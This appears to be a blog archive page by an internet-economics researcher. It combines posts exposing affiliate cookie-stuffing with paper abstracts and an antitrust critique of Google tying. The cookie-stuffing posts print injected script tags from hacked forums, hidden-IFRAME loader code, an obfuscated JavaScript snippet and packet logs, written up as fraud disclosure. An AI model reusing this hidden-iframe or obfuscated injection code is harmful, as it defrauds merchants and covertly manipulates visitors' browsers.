Search My Logs of Affiliate Fraud

Since 2004, I’ve been tracking and reporting all manner of rogue affiliatesusing spyware and adware to cover competitors’ sites; using trickier spyware and adware to claim commission on merchants’ organic traffic; typosquatting; stuffing cookies through invisible IFRAME’s and IMG’s, banner ads, and even hacked forum sites; and the list goes on. I now have automation catching these practices in ever-increasing quantities.

While I’ve written up dozens of rogue affiliates on this site and in various presentations, today Wesley Brandi and I are introducing something better: query-based access to our records of affiliate fraud targeting top affiliate merchants. Enter a merchant’s domain name, and we’ll tell you how much affiliate fraud we’ve seen targeting that domain — handy for merchants wanting to check whether their program is clean, and for affiliates wanting to confirm the trustworthiness a program they’re considering promoting. We’re not currently posting details of the specific perpetrators, but we have affiliate ID numbers, domain names, and packet log proof on file for each violator, and we can provide these upon request.

Take a look:

Affiliate Fraud Information Lookup
(2015 update: service no longer operational)

Using Internet Data for Economic Research

Edelman, Benjamin. “Using Internet Data for Economic Research.” Journal of Economic Perspectives 26, no. 2 (Spring 2012): 189-206.

The data used by economists can be broadly divided into two categories. First, structured datasets arise when a government agency, trade association, or company can justify the expense of assembling records. The Internet has transformed how economists interact with these datasets by lowering the cost of storing, updating, distributing, finding, and retrieving this information. Second, some economic researchers affirmatively collect data of interest. Historically, assembling a dataset might involve delving through annual reports or archives that had not previously been organized into a format ready for research: in some cases, surveying stores, factories, consumers, or workers, or in other cases, carrying out an experiment. For researcher-collected data, the Internet opens exceptional possibilities both by increasing the amount of information available for researchers to gather and by lowering researchers’ costs of collecting information. In this paper, I explore the Internet’s new datasets, present methods for harnessing their wealth, and survey a sampling of the research questions these data help to answer.

Advertising Disclosures: Measuring Labeling Alternatives in Internet Search Engines

Edelman, Benjamin, and Duncan S. Gilchrist. “Advertising Disclosures: Measuring Labeling Alternatives in Internet Search Engines.” Information Economics and Policy 24, no. 1 (March 2012): 75-89.

In an online experiment, we measure users’ interactions with search engines, both in standard configurations and in modified versions with clearer labels identifying search engine advertisements. In particular, for a random subset of users, we change “Sponsored links” or “Ads” labels to instead read “Paid Advertisements.” Relative to users receiving the “Sponsored link” or “Ad” labels, users receiving the “Paid Advertisement” label click 25% and 27% fewer advertisements, respectively. Users seeing “Paid Advertisement” labels also correctly report that they click fewer advertisements, controlling for the number of advertisements they actually click. Results are most pronounced for commercial searches and for vulnerable users with low education and little online experience.

Hack-Based Cookie-Stuffing by Bannertracker-Script with Wesley Brandi

Last month we presented an example cookie-stuffer using encoded JavaScript to drop scores of cookies invisibly. But how can such a cookie-stuffer get traffic to its site? Today’s example is particularly nefarious: Perpetrators using server bannertracker-script.com have hacked at least 29 different online discussion forums to add invisible code that lets them cookie-stuff forum visitors. Through this approach, perpetrators have gained access to a particularly large amount of traffic — letting them target all the more users.

Getting Traffic to Bannertracker-script

The perpetrators appear to be targeting a documented exploit in vBulletin (a popular forum discussion program built in PHP/MySQL) versions v4.x to v4.1.2. The exploit allows for a remote attacker to execute arbitrary PHP script as well as untrusted SQL queries. It was first reported in German in April 2011, then in English in January 2012. A video tutorial even offers step-by-step instructions on how to use this exploit.

Our automation systems have examined more than 500,000 sites, searching for code promoting the cookie-stuffers we are following. We have found numerous affected sites, including sites as popular as searchenginewatch.com (Alexa traffic rank #2045), webdeveloper.com (#2822) and redflagdeals.com (#3188) along with many more. Selected pages of these sites (typically the forum pages) embed hostile code from Bannertracker-script.

In each instance, the hostile code appears as a brief JavaScript addition to an otherwise-legitimate site. See the single line of inserted code highlighted in yellow below. Notably, the hostile code appears within a block of code embedding comScore tags (green highlighting below) — a place where site designers expect to see external JavaScript references, making the Bannertracker-script insertion that much less likely to be detected.

<!– Begin comScore Tag –>
<script type=”text/javascript” src=”http://www.bannertracker-script.com/banner/ads.php?a=big”></script>
<script type=”text/javascript”>document.write(“<img id=’img1′ height=’1′ width=’1′>”);
document.getElementById(“img1”).src=”http://beacon.scorecardresearch.com/scripts/beacon.dll? C1=2&C2=5915554&C3=5915554&C4=www.redflagdeals.com &C5=&C6=&C7=” + escape(window.location.href) + “&C8=” + escape(document.title) + “&C9=” + escape(document.referrer) + “&rn=” + Math.floor(Math.random()*99999999);</script><!– End comScore Tag –>

Examining Bannertracker-script insertions on other sites, we found them in other inconspicuous places — for example, just before the </HTML> tag that ends a page.

Cookie-Stuffing by Bannertracker-script

As a result of the hack-based code insertion shown above, a user visiting any affected site receives Bannertracker-script code also. That code creates an invisible IFRAME which loads the Amazon site via an affiliate link. Here’s how: First, the code creates a doubly-invisible DIV (CSS style of display:hidden and visibility:none, shown in blue highlighting below). The code then creates an invisible IFRAME within that DIV (CSS display:none, visibility:hidden, size of 0x0 pixels, shown in purple highlighting below). The code instructs that the DIV load a URL on Http-uptime.com (grey) which redirects through to an Amazon Associates affiliate link with affiliate ID camerlucidpho-20 (red). See also the full packet log.

GET /banner/ads.php?a=big HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.bannertracker-script.com

HTTP/1.1 200 OK …
GPad = {
init: function () {
document.write(‘<div id=”GPAD” style=”visibility:hidden; display:none;”></div>’);
var frame = document.createElement(‘iframe’);
frame.setAttribute(‘src’, ‘http://www.http-uptime.com/banner/index.php‘);
frame.setAttribute(‘style’, ‘display:none; width: 0px; height 0px; border: none; visibility:hidden‘);
frame.style.visibility = ‘hidden’;
frame.style.display = ‘none’;
var div = document.getElementById(‘GPAD’);
div.appendChild(frame);
}
}
GPad.init();

GET /index.php HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.http-uptime.com

HTTP/1.1 200 OK …
<html><head><meta http-equiv=”refresh” content=”0;url=http://www.http-uptime.com/icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932″ />
</head></html>

GET /icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932 HTTP/1.1 …
Host: www.http-uptime.com

HTTP/1.1 302 Moved Temporarily …
Location: http://www.amazon.com/gp/search?ie=UTF8&keywords=&tag=camerlucidpho-20&index=pc-hardware&linkCode=ur2&camp=1789&creative=932

The net effect is to load Amazon’s site invisibly. Amazon operates using a 24-hour referral period, so if a user happened to make a purchase from Amazon within the next 24 hours, Amazon would credit this affiliate as the putative referer of the traffic — paying this affiliate a commission of at least 4% and as much as 15%.

Concealment by Bannertracker-script

The preceding discussion noted two mechanisms by which Bannertracker-script attempted to conceal its actions. First, it placed its tags within the comScore section of affected sites, where unfamiliar code is less likely to attract suspicion. Second, it loaded its tags invisibly, including via the multiple nested invisible elements detailed above. Still, by sending so much to Amazon, Bannertracker-script clearly recognized that it risked attracting scrutiny from Amazon, which might question how one affiliate obtained so much traffic. Bannertracker-script therefore turned to multiple Amazon Associates ID’s. In our testing, we found more than 200 such IDs of which we report 20 below:

abacemedi-20 aledesoftw-20 anybr-20 arizonosteopc-20  
actkid-20 allesbluefree-20 apa0c5-20 artofdri-20
adirooutdocom-20    alsjopa-20 apitherapy03-20   astba-20
afrkilbeemov-20 amergumbmachc-20    apitroservic-20 atlcitgam-20
ajelcand-20 ancestorville-20 arasmazi-20 babblu-20

Using multiple IDs raises a further risk for Bannertracker-script: A diligent investigator might request the Bannertracker-script site repeatedly in order to attempt to learn most or all of Bannertracker-script’s IDs. Bannertracker-script attempted to reduce this risk via server-side logic to avoid serving the same user with two different ID’s, based on variables that seem to include client IP address, HTTP User-agent header, and more.

In principle, investigators might recognize Bannertracker-script by its distinctive domain name. But in fact we have seen this perpetrator also using other domain names. (We refer to the perpetrator as Bannertracker-script because that was the first such domain we found and, in our testing, still the most frequent.)

Affected Merchants

To date, we have primarily seen Bannertracker-script targeting Amazon. But other merchants are vulnerable to similar attacks that drop a large number of cookies invisibly in hopes that users make purchases from the corresponding merchants. In this regard, large merchants are particularly vulnerable: The more popular a merchant is, the greater the likelihood of a given user making a purchase from that merchant in a given time period. Indeed, we have also seen Bannertracker-script using the same technique to drop cookies for several adult web sites

Amazon’s exposure is somewhat reduced by its 24-hour affiliate commission window — paying commission to affiliates only on a user’s purchases within 24 hours of invocation of an affiliate link, whereas other merchants often grant credit for as long as 30 days. But Amazon’s large and growing popularity limits the effectiveness of this measure. Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. If Bannertracker-script can deposit one million Amazon cookies, via hacks of multiple popular sites, it will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents — substantial revenue, particularly given the prospect of hacking other vulnerable web sites. Ordinarily, one might expect Amazon to notice a new affiliate with a large spike in earnings. But by spreading its commissions across hundreds of affiliate accounts, Bannertracker-script may avoid or deflect such scrutiny.

We have reported this matter to our contacts at Amazon and will update this post with any information Amazon cares to share.

Large-Scale Cookie-Stuffing at Eshop600.co.uk with Wesley Brandi

We have recently been testing web sites that drop affiliate cookies invisibly — claiming to have referred users to the corresponding merchants’ sites, when in fact users never asked to visit the merchants’ sites and never saw the merchants’ sites. Nonetheless, through invisible IFRAMEs, invisible IMG tags, and similar constructs, these pages manage to set affiliate cookies indicating that referrals occurred. Then, if users happen to make purchases from the targeted merchants, the cookie-stuffers collect affiliate commissions. With commissions as large as 40%, this tactic can be lucrative.

One large offender we recently found: Eshop600.co.uk. In automated and manual testing, we found 36 pages on the Eshop600 site, including the site’s home page, which drop dozens of cookies invisibly. To a user glancing at a web browser, the Eshop600 site looks perfectly normal:

The Eshop600 site

But within the affected Eshop600 pages are 26 blocks of encoded JavaScript code. An example:

var i,y,x="3c696d672069643d22706963333722207372633d22....";y="";var _0x70c3=["x6Cx65x6Ex67x74x68","x25","x73x75x62x73x74x72","x77x72x69x74x65"];for(i=0;i<x[_0x70c3[0]];i+=2){ y+=unescape(_0x70c3[1]+x[_0x70c3[2]](i,2));} ;document[_0x70c3[3]](y);

We decoded this JavaScript to find an invisible IMG tag.

<img width="75" height="100" id="pic37" style="display: none;" alt=" " src="http://www.tkqlhce.com/click-3910892-5590799"/>

Note the CSS STYLE of display:none (yellow highlighting) which makes the entire tag invisible. In any event, the 75×100 size (green highlighting) is too small to load a genuine web page. Nonetheless, a trace of the redirect sequence shows that the IMG does indeed redirect through an affiliate network (ValueClick’s Commission Junction) (red) and on to an affiliate merchant (blue).

GET /click-3910892-5590799 HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateHost: www.tkqlhce.comConnection: Keep-AliveHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.tkqlhce.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:02 GMTLocation: http://www.apmebf.com/oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB<Content-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:01 GMT---GET /oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.apmebf.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:07 GMTLocation: http://www.kdukvh.com/rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm<Set-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTSet-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:07 GMT---GET /rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.kdukvh.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.kdukvh.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:18 GMTLocation: http://www.argos.co.uk/webapp/wcs/stores/servlet/ArgosCreateReferral?storeId=10001&referrer=COJUN&cmpid=COJUN&referredURL=&_%24ja=tsid%3A11674%7Cprd%3A3910892Set-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: PBLP=849260:3910892:1327883178648:cjo; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:18 GMT

Of course www.argos.co.uk is just one of dozens of merchants affected. Below are 26 merchants we’ve found targeted by Eshop600, including merchants using affiliate networks Affiliate Window (AW), Commission Junction (CJ), TradeDoubler (TD), and Perfiliate (now owned by Affiliate Window).

direct.asda.com (AW) www.britishairways.com (AW)
www.dorothyperkins.com (AW) www.screwfix.com (AW)
groceries.asda.com (Perfiliate) www.burton.co.uk (AW)
www.evans.co.uk (AW) www.sky.com (AW)
phone-shop.tesco.com (TD) www.comet.co.uk (AW)
www.halfords.com (AW) www.tesco.com (TD)
store.three.co.uk (Perfiliate) www.currys.co.uk (AW)
www.hsamuel.co.uk (AW) www.vodafone.co.uk (AW)
www.annsummers.com (AW) www.debenhams.com (AW)
www.johnlewis.com (AW) www.wilkinsonplus.com (AW)
www.argos.co.uk (CJ) www.dixons.co.uk (AW)
www.missselfridge.com (AW) www.asda.co.uk (Perfiliate)
www.diy.com (AW) www.pcworld.co.uk (AW)  

Beyond encoded JavaScript, Eshop600 also tried other methods to avoid detection. Load an Eshop600 page repeatedly, and it won’t stuff cookies every time; the site is clearly attempting to recognize repeat visitors to avoid restuffing the same users more than once. That makes Eshop600’s practice harder to replicate (an extra challenge for anyone trying to prove an infraction) and helps reduce telltale signs in merchants’ logs.

On one view, these practices are nothing new: Ben has been writing these up since 2004. But affiliate merchants and networks need to remain vigilant to catch these cheaters. We’re finding many dozens of affiliate cookie-stuffers per month, along with other rogue affiliates using spyware/adware, typosquatting, and more. It’s not unusual for cheaters to be among a merchants’ largest affiliates; for example, the 2010 indictment of Shawn Hogan alleges that he was the single largest affiliate in eBay’s affiliate program in 2006-2007, collecting more than $15 million over 18 months. Now, most affiliate programs are far smaller than eBay’s, yielding a correspondingly lower opportunity for fraud. But for mid-sized merchants, there are typically large savings in catching and ejecting all rule-breakers.

Advertising Disclosures in Online Apartment Search with Paul Kominers

A decade ago, the FTC reminded search engines of their duty to label advertisements as such. Most general-purpose search engines now do so (though they’re sometimes less than forthright). But practices at specialized search engines often fall far short.

In today’s posting, Paul Kominers and I examine leading online apartment search services and evaluate the disclosures associated with their paid listings. We find paid placement and paid inclusion listings at each site, but disclosures range from limited to nonexistent. Where disclosures exist, they are largely hidden behind multiple intermediate pages, effectively invisible to most users. We propose specific ways these sites could improve their disclosures, and we flag their duties under existing law.

Advertising Disclosures in Online Apartment Search

Google Tying Google Plus and Many More

Disclosure: I serve as a consultant to various companies that compete with Google. But I write on my own — not at the suggestion or request of any client, without approval or payment from any client.

This week Google announced Google Search Plus Your World (“Google Search Plus” for short). Reaction has been critical. Danny Sullivan says Google Search Plus “pushes Google+ over relevancy,” and he offers compelling examples demonstrating this favored treatment. Meanwhile, EPIC executive director Marc Rotenberg argues that Google is “using its market dominance in a separate sector [search] … to fight off its challenger Facebook” — essentially, alleging that Google is tying Google+ to Google Search, forcing users to accept the former if they want the latter.

As Danny and Marc point out, Google is favoring its own ancillary services even when other destinations are objectively superior, and Google is using its dominance in search to compel users to accept Google’s other offerings. But this problem is much bigger than Google Search Plus: Google has used similar tying tactics to push dozens of its products for years. I’m working on a detailed article with numerous examples plus relevant antitrust analysis. But with Google Search Plus prompting so much interest, I wanted to flag other areas where Google has invoked these tactics.

This piece proceeds in three parts: I evaluate the competitive implications of Google favoring its own services, including the special benefits Google grants to its own services. I show how Google penalizes those who decline to participate in its tied offerings, including using tying to force others to submit to Google’s will even in areas where Google is not yet dominant. Finally, I briefly survey the legal implications and propose a promising but lightweight remedy to begin to curtail the harmful effects of Google’s tying.

My takeaway: Google’s tying tactics should not be permitted. Google’s dominant position in search requires that the company hold itself to a higher level of conduct, including avoiding tying its other products to its dominant search service. Google has repeatedly crossed the line, and antitrust enforcement action is required to put a stop to these practices.

The Competitive Implications of Favoring Google’s Own Services

I’ve found more than a dozen Google services receiving favored placement in Google search results. Consider Google Blog Search, Google Book Search, Google Checkout, Google Health, Google Images, Google Maps, Google News, Google Realtime, Google Shopping, and Google Video. Some have developed into solid products with loyal users. Others are far weaker. But each enjoys a level of favored placement in Google search results that other services can only dream of.

Google uses premium placements and traffic guarantees to address the “chicken and egg” problem that undermines the launch of many online businesses. For example, many retailers might be pleased to be listed (and even be willing to pay to be listed) in a review site or product search site that has many readers. But finding those readers cost-effectively requires algorithmic search traffic, which a new site cannot guarantee — hindering the site’s efforts to attract advertisers. So too for books, local search, movies, travel, and myriad other sectors. Ordinary sites struggle to overcome these challenges — for example, buying expensive pay-per-click advertising to drive traffic to their sites, or beginning with a period in which they have undesirably few participants. In contrast, anyone assessing the prospects of a new Google service knows that Google can grant its services ample free traffic, on demand and substantially guaranteed. Thus, the success of a new Google service is much more predictable — reducing Google’s barriers to expansion into new sectors. Indeed, if partners recognize that Google can send such traffic whenever it chooses to do so, they may even be willing to join before Google turns on the spigot.

Conversely, Google’s ability to favor its own service dulls the incentive for others to even try to compete. Who would risk capital, energy, and talent in building a new image search engine when Google presents Google Image Search results automatically? A new entrant might be 20% better, by whatever metric, but Google’s automatic provision of a “good enough” option dulls users’ interest in finding a best-of-breed alternative. The problem is particularly acute because the top-most result enjoys 34%+ of all clicks — so when Google takes that position for itself, there’s far less for everyone else.

Google also grants its ancillary services the benefit of certain placement. Ordinary sites have little assurance of what algorithmic search traffic they will receive. They may rank highly for some terms and worse for others. Furthermore, rankings often vary over time, including sudden changes for no apparent reason. As a result, most sites struggle to build business plans around algorithmic search traffic; indeed, companies have laid off staff after unexpected drops in algorithmic search traffic. In contrast, Google’s own services can feel confident in the traffic they will receive from Google — allowing them to plan budgets, advertising sales, hardware requirements, and overall strategy.

By all indications, free traffic from Google Search has played a valuable role in launching many Google businesses. For example, Google Maps usage remained sluggish until Google started to present inline Google Maps directly within Search Results, a practice that began in earnest in 2007. As Consumer Watchdog’s 2010 “Traffic Report” shows, this change precipitated a sharp increase in Google Maps’ market share: Traffic to Google Maps tripled while traffic to competing map sites fell by half.

So too for Google’s launch of Google Finance. service. For example, as of December 2006, Hitwise reported that fully 57% of traffic to Google Finance came from Google Search. By 2009, just 29% of Google Finance traffic came from other Google properties. By providing its ancillary services with additional traffic, when desired and in large quantities unavailable to others, Google gives its ancillary services a greater chance of achieving widespread usage and attracting users and advertisers.

The Special Benefits Google Reserves for Its Own Services

When Google presents its ancillary services within search results, it gives its services distinctive layout and format benefits unavailable to other sites. For example, Google Maps appears with an oversized full-color embedded map, whereas links to other map services appear only as plain hyperlinks. So too for links to Google Shopping, which often feature tabular reports of product pictures, vendors, and prices, whereas competing comparison shopping search engines receive only bare text. Until June 2011, Google Checkout advertisers enjoyed a special logo adjacent to their AdWords ads — particularly valuable since image advertisements were essentially nonexistent throughout that period. But advertisers who chose other streamlined checkout tools (like Paypal) got no such benefit. Favored treatment extends to the most obscure Google services. Even Google Health listings received a distinctive layout and colored image.

Furthermore, when Google favors its own ancillary services, it sometimes bypasses the algorithms that ordinarily allocate search results. By all indications, Google staff manually override algorithmic results, manually specifying that specific Google services are to appear in specific positions for specific keywords. Of course no other site enjoys such overrides.

Google also seems to exempt its own services from the “host crowding” rules that ordinarily assure source diversity. In 2007, Google’s Matt Cutts stated that a single page of results will feature “up to two results” from a single host, though he added that for a domain that “is really relevant” Google “may still return several results from that domain” (emphasis added). But it seems Google waives this rule for its own services. In April 2011, Aaron Wall flagged a search yielding five separate Google Books results among the ten links shown in the first page of Google Search. A commenter found another search term for which nine separate results all pointed to Google Books. (I have a screenshot on file.) On one view, Google Books indexes the work of multiple authors and publishers, and diversity among those authors and publishers provides adequate representation of alternative viewpoints. Yet other repositories also aggregate material from independent authors (consider books at Amazon, or any of thousands of online discussion forums), but only Google seems to enjoy an exception from “host crowding” rules.

Google Effectively Penalizes Those who Decline to Participate In Its Tied Offerings

I joined Google Plus not because I wanted to participate, not to take a look around, but because I perceived that Google would grant my site preferred placement — more algorithmic traffic — if I linked my Google Plus account to my web site and online publications. It’s hard to figure out whether I was right. But SEO forums are full of users who had the same idea. So Google can force users to join Google Plus to avoid receiving, or expecting to receive, lower algorithmic search ranking. Certainly myriad sites added Google +1 buttons (giving Google both data and real estate) not because they genuinely wanted Google buttons on their sites, but because they feared others would overtake them in search results if they failed to employ Google’s newest service.

If an airline declines to participate in Google Flights, its listings are labeled 'no booking links available.' Google fails to offer a more helpful link or booking shortcut, even though it could easily do so.If an airline declines to participate in Google Flights, its listings are labeled “no booking links available.” Google fails to offer a more helpful link or booking shortcut, even though it could easily do so.

Google uses similar tying tactics to compel use of its other services. Consider airlines negotiating terms for appearance in Google Flight Search. If Southwest Airlines prefers not to be included in Expedia, it can easily stay out (and in fact it has). Better yet, a diligent airline can negotiate with various travel sites to seek improved terms — playing one travel site against another to reduce fees. But Google’s dominant position impedes any such negotiation. There’s only one Google Flight Search at the top of Google search results, and any airline that refuses Google’s terms is left behind: Google presents a “no booking links available” bubble, even though Google could easily send bookings to an airline web site without any commercial relationship with the site and without requiring payment from the site. (For an example, click to browse Southwest flights Boston-BWI in May — simple HTML and JavaScript, essentially a “deep link.”)

At the very least, Google could link to an airline’s home page in the bottom right, where the “Book” link usually appears; the bottom-right corner is the standard location for a button to continue a multi-step process, and that’s the location where Google has trained users to look to proceed with booking. In contrast, Google’s bottom-left links are easily overlooked. With so many better options available to Google, Google’s decision to withhold this link looks like intentional punishment for any airline that rejected Google’s terms.

Google links to the 'owner site' only at the far bottom of the drop-down -- putting all advertisers in more prominent positions.Google links to the “owner site” only at the far bottom of the drop-down — putting all advertisers in more prominent positions.

Meanwhile, by effectively compelling participation, Google enjoys high revenue from competing bidders. Consider the drop-down lists Google now shows with hotel listings, presenting advertisements for multiple booking services. A user can enter desired dates to receive a price quote from each booking service, with one-click access to the chosen vendor. But some users prefers to book with a hotel directly — perhaps to reduce booking complexity (less finger-pointing if something goes wrong) or enjoy loyalty program benefits. (Users may also know that hotels pay substantial commissions to the web sites that gather reservations, and some users may wish to spare hotels those costs.) If a consumer clicks the “owner site” link, the consumer will find that his booking dates are discarded, requiring reentry. And even though the “owner site” is the single most authoritative listing for a given property, Google puts all booking services above — here too, favoring advertising revenue over user convenience. It’s an experience savvy hotels would decline completely if Google offered that choice. Instead, Google makes this drop-down compulsory, and there’s no way a hotel can opt out.

To its credit, Twitter has recognized the value of the data it holds and has declined to let Google harvest that data on terms Google dictates. But when Twitter complained about Google’s favored treatment of Google Search Plus, Google responded: “We are a bit surprised by Twitter’s comments about Search plus Your World, because they chose not to renew their agreement with us last summer.” Google’s response completely misses the point. For one, as Danny Sullivan points out, Google fails to use Facebook and Twitter content it knows about (without needing a data license). Furthermore, Google equally fails to use content from thousands of other sources — from smaller social networks, for example. Instead, Google favors its own service.

Over and over, Google has tied its services in various combinations to compel (or attempt to compel) others to bend to its will.

  • Google told Yelp it had to let Google present Yelp reviews in Google Places if Yelp wanted to remain in ordinary Google Search. That is, Google tied its dominant search service (where Yelp wanted to stay visible) to its upstart Places service (which Yelp did not care to support).
  • Google’s contradictory statements left newspapers believing for years that they had to participate in Google News if they wanted to remain in Google Search. (See e.g. the multiple contradictory postscripts in Danny Sullivan’s August 2009 posting about newspapers’ concerns — indicating that even he struggled to understand Google’s true policy. I have other inconsistent statements on file.) For newspapers, then, Google also effectively tied its dominant search service (where newspapers absolutely wanted to be listed) to Google News (which newspapers tended to view skeptically). By the time Google clearly stated that newspapers could exit Google News while staying in Google Search, Google News had achieved enough traction that leaving was a much less desirable choice.
  • For years, Google’s YouTube offered filtering technology (to identify and remove copyrighted works) only to companies that granted licenses to YouTube, on the terms YouTube sought, but not on companies that refuse Google’s terms. To get the filter — the only quick, effective way to block infringing content — rights-holders had to accept Google’s license terms.

I’ll have more examples in my forthcoming paper.

On one level, these are standard “all-or-nothing” tactics: Google has something others want, and Google only provides the desired service if it gets it way. But the impact is clear: Google’s multiple mutually-reinforcing tying arrangements extend Google’s position of dominance, forcing prospective business partners to bend to Google’s will, and enlarging Google’s control over ever more sectors.

Legal Implications

When Google presents its ancillary services in its search results, it engages in classic “tying” behavior, raising concern under US and European antitrust law. Certainly Google’s search service is dominant, and US and EU investigations have already held as much — triggering the heightened duties of those with a dominant position.

Yet Google offers its search results only with its own ancillary services. In particular, Google gives no mechanism for users to obtain Google Search with others’ ancillary services or with no ancillary services at all. This tactic has already led Google to dominance in blog search, book search, image search, maps, news, and product search, and it is amply clear how this tactic could soon lead Google to dominance in reviews, local search, and travel search (satisfying the “dangerous probability” test in Verizon v. Trinko note 4). Is Google likely to succeed in social? It seems network effects offer somewhat greater protection to Facebook and Twitter than they do to review sites or travel search sites. But when Google uses the same tying strategy to claim a leg up in myriad sectors, it’s no great stretch to view the strategy with equal skepticism wherever it arises.

In Remedies for Search Bias, I offered several suggestions to blunt the worst of these practices. Most relevant: Google should let users swap its own services for competitors’ offerings. Consider users’ ability to choose their preferred web browser, media player, email program, and myriad other applications — choices that facilitates continued competition and innovation in all these areas. Yet a user at Google.com has zero ability to eschew Google Maps for Mapquest, or to replace Google Places reviews with Yelp. The first time a user runs a search calling for a review, Google could ask the user for his preferred review provider, and an unobtrusive drop-down box would let the user make changes later. Similar prompts would appear, as needed, for other key sectors — limited, of course, to areas where Google seeks to promote an offering of its own. I was thrilled when, in a little-noticed remark last summer, Danny Sullivan endorsed this approach (“hey eric: how about letting people choose their shopping, local, etc. one box provider?”). It’s an elegant and straightforward solution, sidestepping the most complicated questions of “regulating search” but putting an important check on Google’s abuse of its dominant position in search.

Internet Protocol Numbers and the American Registry for Internet Numbers: Suggested Guidance for Bankruptcy Trustees, Debtors-in-Possession, and Receivers

Ryan, Stephen, Benjamin Edelman, and Matthew Martel. “Internet Protocol Numbers and the American Registry for Internet Numbers: Suggested Guidance for Bankruptcy Trustees, Debtors-in-Possession, and Receivers.” BNA’s Bankruptcy Law Reporter (January 5, 2012).

Bankruptcy trustees, debtors-in-possession, and receivers are seeing an increase in efforts to sell Internet Protocol (IP) addresses, also referred to “IP Numbers.” IP Numbers are the unique numeric identifiers associated with computers connected to the Internet. While sales of IP Numbers can deliver value to the estate, IP Numbers are unusual in that their value, use, and transfer are enhanced by applicable contract and policy. Ignoring the contracts and policies can delay the sale process and reduce or negate the value of IP Numbers. This article seeks to provide an overview of issues associated with IP Number sales, as well as suggesting an approach for permissible and straightforward sales to obtain the highest value.